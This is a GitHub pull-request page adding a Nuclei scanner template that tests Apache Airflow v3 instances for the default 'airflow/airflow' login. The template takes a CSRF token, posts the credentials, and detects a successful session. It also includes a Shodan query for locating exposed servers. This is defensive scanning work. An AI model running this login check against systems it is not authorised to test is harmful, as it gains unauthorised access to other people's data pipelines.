Skip to content

Update Apache Airflow Default Login (v3) #12328

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 8 commits into from
Jun 17, 2025
Merged

Update Apache Airflow Default Login (v3) #12328

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
8 commits
Select commit Hold shift + click to select a range
0fc62c1
airflow: add template for v3 console
hdm Jun 13, 2025
4472333
airflow: consistency tweaks
hdm Jun 13, 2025
36b3066
airflow: adjust indent for regex
hdm Jun 13, 2025
f9b6377
airflow: correct indentation
hdm Jun 13, 2025
58ddf41
airflow: quote regex
hdm Jun 13, 2025
781d0c5
airflow: update yaml indents
hdm Jun 13, 2025
b71086c
airflow: reformat yaml
hdm Jun 14, 2025
287e5b0
airflow: yaml consistency
hdm Jun 14, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
6 changes: 4 additions & 2 deletions http/default-logins/apache/airflow-default-login.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -4,14 +4,16 @@ info:
name: Apache Airflow Default Login
author: pdteam
severity: high
description: An Apache Airflow default login was discovered.
description: Apache Airflow default login credentials were discovered.
reference:
- https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
product: airflow
vendor: apache
max-request: 2
shodan-query: title:"Sign In - Airflow"
tags: airflow,default-login,apache
Expand Down Expand Up @@ -58,4 +60,4 @@ http:
- type: word
words:
- 'You should be redirected automatically to target URL: <a href="/">'
# digest: 490a0046304402210096cf86afcc6da7a459ff7282c249845a9d3b65788c3ba773d82042d9c580ac49021f45477719cf33c6ae7eb8b46c995163eb0e96b527744259ce53812242579328:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402210096cf86afcc6da7a459ff7282c249845a9d3b65788c3ba773d82042d9c580ac49021f45477719cf33c6ae7eb8b46c995163eb0e96b527744259ce53812242579328:922c64590222798bb761d5b6d8e72950
63 changes: 63 additions & 0 deletions http/default-logins/apache/airflow-v3-default-login.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,63 @@
id: airflow-v3-default-login

info:
name: Apache Airflow v3 Default Login
author: pdteam
severity: high
description: Apache Airflow v3 default login credentials were discovered.
reference:
- https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
product: airflow
vendor: apache
max-request: 2
shodan-query: title:"Airflow"
tags: airflow,default-login,apache

http:
- raw:
- |
GET /auth/login/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /auth/login/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/auth/login

username={{username}}&password={{password}}&_csrf_token={{csrf_token}}

attack: pitchfork
payloads:
username:
- airflow
password:
- airflow

extractors:
- type: regex
name: csrf_token
group: 1
internal: true
regex:
- type="hidden" value="(.*?)">

matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_1, "Airflow")'
- 'contains(body_1, "csrf_token")'
- 'status_code_2 == 302'
- 'contains(header_2, "session=")'
condition: and
- type: word
words:
- 'You should be redirected automatically'
# digest: 490a0046304402210096cf86afcc6da7a459ff7282c249845a9d3b65788c3ba773d82042d9c580ac49021f45477719cf33c6ae7eb8b46c995163eb0e96b527744259ce53812242579328:922c64590222798bb761d5b6d8e72950